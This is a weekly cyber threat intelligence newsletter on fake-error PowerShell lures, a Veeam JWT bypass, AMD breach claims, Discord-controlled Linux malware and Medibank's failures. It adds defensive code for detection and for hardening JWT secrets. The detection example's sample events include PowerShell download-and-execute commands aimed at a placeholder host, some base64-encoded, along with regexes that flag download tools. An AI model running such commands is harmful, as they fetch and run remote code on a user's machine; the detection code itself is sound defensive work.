Volume 2, Issue no. 25 is out and in the latest weekly AUCloud Cyber Threat Intelligence Report we reveal:
Fake Google Chrome errors trick you into running malicious PowerShell scripts
A new cyber security threat involves cybercriminals deploying fake error messages that mimic Google Chrome, Microsoft Word and OneDrive alerts. These messages deceive users into running malicious PowerShell scripts under the pretext of fixing the supposed issue; instead, the script installs malware on the user's system. The tactic uses social engineering to exploit trust in familiar software error prompts, leading users to inadvertently compromise their own devices.
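From the defender's side, the tell-tale of this lure is PowerShell being started interactively (the user pastes a command into the Run dialog or a terminal) with traits that real administrative automation rarely has. The following is an added example, not code from the report or from any vendor: a small triage routine over constructed Sysmon-style process-creation events. The field names, the indicator patterns and the sample command lines (including the example.invalid URLs) are this example's own assumptions, not indicators published in the report.

```python
import base64
import re
from typing import Optional

# Constructed Sysmon-style process-creation events; invented for this example,
# not indicators from the report. example.invalid is a reserved placeholder host.
_ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"
    .encode("utf-16le")).decode("ascii")

SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass '
                '-Command "iex (iwr http://example.invalid/fix.ps1).Content"'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": f"powershell -w 1 -enc {_ENCODED}"},
    {"parent": r"C:\Program Files\Vendor\Agent\agent.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -NoProfile -File C:\Scripts\inventory.ps1"},
]

# Parents a pasted command is launched from (Win+R and the shell itself go via
# explorer.exe; a terminal or cmd window are the other typical cases).
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe", "windowsterminal.exe"}

# Command-line traits that are rare in legitimate admin automation. The names
# and regexes are this example's assumptions, not published detection content.
INDICATORS = {
    "hidden_window": re.compile(r"(?<![\w-])-w(?:indowstyle)?\s+(?:hidden|1)\b", re.I),
    "execution_policy_bypass": re.compile(r"(?<![\w-])-(?:executionpolicy|ex|ep)\s+bypass\b", re.I),
    "encoded_command": re.compile(r"(?<![\w-])-(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I),
}
_EXEC = re.compile(r"\b(?:iex|invoke-expression)\b", re.I)
_FETCH = re.compile(r"\b(?:iwr|invoke-webrequest|invoke-restmethod|irm|downloadstring|"
                    r"downloadfile|net\.webclient|curl|wget)\b", re.I)


def decode_encoded_command(blob: str) -> Optional[str]:
    """-EncodedCommand carries base64 of UTF-16LE text; return the text or None."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_event(event: dict) -> Optional[dict]:
    """Return an alert for a suspicious interactive PowerShell launch, else None."""
    image = event["image"].rsplit("\\", 1)[-1].lower()
    parent = event["parent"].rsplit("\\", 1)[-1].lower()
    if image not in {"powershell.exe", "pwsh.exe"} or parent not in INTERACTIVE_PARENTS:
        return None
    cmdline = event["cmdline"]
    hits = [name for name, rx in INDICATORS.items() if rx.search(cmdline)]
    # Scan the decoded payload as well: the download-and-run step usually hides there.
    decoded = None
    match = INDICATORS["encoded_command"].search(cmdline)
    if match:
        decoded = decode_encoded_command(match.group(1))
    text = cmdline + "\n" + (decoded or "")
    if _EXEC.search(text) and _FETCH.search(text):
        hits.append("download_and_execute")
    if not hits:
        return None
    return {"parent": parent, "indicators": sorted(hits), "decoded": decoded}


def scan(events) -> list:
    """Run analyze_event over a batch and keep only the alerts."""
    return [alert for alert in (analyze_event(e) for e in events) if alert]


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert["parent"], alert["indicators"])
```

The third sample (a vendor agent running a script file) produces no alert, which is the point of keying on the interactive parent: the same PowerShell flags are common in scheduled automation, so the parent process and the decoded payload carry most of the signal.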
Exploit for Veeam Recovery Orchestrator auth bypass available, patch now
A critical vulnerability in Veeam Recovery Orchestrator, identified as CVE-2024-29855, allows unauthorised administrative access due to a hardcoded JSON Web Token (JWT) secret. This exploit enables attackers to bypass authentication effortlessly, posing a significant risk to affected systems. Security researcher Sina Kheirkhah, who disclosed the vulnerability, demonstrated that it’s simpler to exploit than initially described by Veeam.
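A hardcoded JWT secret means every installation shares one signing key, so anyone who has read the product's files can mint tokens the server accepts. The following is an added example, not Veeam's code and not based on the actual secret (which is not reproduced here): a stdlib-only HS256 verifier whose deployment refuses a missing, short or known-default secret at startup, generates a per-installation secret instead, and shows that rotating the secret invalidates tokens minted under the old one. The environment variable name APP_JWT_SECRET and the placeholder default values are this example's assumptions.

```python
import base64
import hashlib
import hmac
import json
import os
import secrets
import time
from typing import Optional

# Placeholder values standing in for a secret that shipped inside a product.
# Constructed for this example; no real vendor value appears here.
KNOWN_BAD_SECRETS = {"changeme", "secret", "PLACEHOLDER_SHIPPED_DEFAULT_SECRET"}
MIN_SECRET_BYTES = 32  # HS256 keys must be at least 256 bits (RFC 7518, section 3.2)


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _unb64url(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def generate_secret() -> str:
    """Per-installation secret: created at deploy time, never in source or images."""
    return secrets.token_urlsafe(48)


def secret_problems(secret: Optional[str]) -> list:
    """Reasons a configured JWT secret must not be accepted (empty list means OK)."""
    if not secret:
        return ["no JWT secret configured"]
    problems = []
    if secret in KNOWN_BAD_SECRETS:
        problems.append("secret is a known shipped/default value")
    if len(secret.encode()) < MIN_SECRET_BYTES:
        problems.append(f"secret shorter than {MIN_SECRET_BYTES} bytes")
    return problems


def load_secret(env=os.environ) -> str:
    """Fail closed at startup instead of falling back to a built-in value."""
    secret = env.get("APP_JWT_SECRET")  # assumed variable name for this example
    problems = secret_problems(secret)
    if problems:
        raise RuntimeError("refusing to start: " + "; ".join(problems))
    return secret


def issue_hs256(claims: dict, secret: str) -> str:
    """Mint a compact HS256 JWT (the server's normal token issuance path)."""
    header = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    payload = _b64url(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(secret.encode(), f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64url(sig)}"


def verify_hs256(token: str, secret: str, now: Optional[float] = None) -> Optional[dict]:
    """Return the claims if signature and expiry check out, else None."""
    try:
        header_b64, payload_b64, sig_b64 = token.split(".")
        header = json.loads(_unb64url(header_b64))
        if header.get("alg") != "HS256":  # algorithm is pinned server-side, not taken from the token
            return None
        expected = hmac.new(secret.encode(), f"{header_b64}.{payload_b64}".encode(),
                            hashlib.sha256).digest()
        if not hmac.compare_digest(expected, _unb64url(sig_b64)):
            return None
        claims = json.loads(_unb64url(payload_b64))
    except (ValueError, UnicodeDecodeError, AttributeError):
        return None
    now = time.time() if now is None else now
    if not isinstance(claims, dict) or "exp" not in claims or claims["exp"] <= now:
        return None
    return claims


def rotation_invalidates_old_tokens() -> bool:
    """Tokens minted under a compromised secret stop verifying once it is rotated."""
    old, new = "PLACEHOLDER_SHIPPED_DEFAULT_SECRET", generate_secret()
    token = issue_hs256({"sub": "admin", "exp": time.time() + 3600}, old)
    return verify_hs256(token, old) is not None and verify_hs256(token, new) is None


if __name__ == "__main__":
    print("startup check on default secret:", secret_problems("changeme"))
    print("rotation invalidates old tokens:", rotation_invalidates_old_tokens())
```

The remediation sequence this encodes is the one a patch for a hardcoded-secret finding has to include: ship no default, generate the secret per installation, and rotate it immediately after upgrading, because any token signed with the old value remains valid for as long as that value is still accepted.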
AMD Investigates data breach claims by RansomHouse
AMD, one of the leading semiconductor companies, is currently investigating a significant data breach claimed by the cyber extortion group RansomHouse. The attackers allege they have stolen 450 GB of sensitive data, including network files, system information, and passwords. This incident underscores the critical importance of robust cyber security measures and highlights vulnerabilities in even the most advanced tech companies.
New Linux malware uses emojis sent via Discord
A new Linux malware, dubbed ‘DISGOMOJI,’ uses emojis sent through Discord for command and control (C2). This novel approach was discovered by Volexity, a cyber security firm that identified a Pakistan-based threat actor, UTA0137, targeting Indian government agencies. The malware’s reliance on emojis for executing commands helps it bypass traditional security measures.
Who was to blame? Further updates on the infamous Medibank Private hack
Recent investigations have revealed critical security oversights leading to the Medibank Private data breach. Key findings include missed Endpoint Detection and Response (EDR) alerts, inadequate multi-factor authentication (MFA), and delayed response times. These lapses allowed hackers to exploit stolen credentials, leading to the compromise of personal data for 9.7 million individuals. The Australian Information Commissioner (AIC) has detailed these failures in a court filing, highlighting Medibank’s insufficient investment in cyber security measures.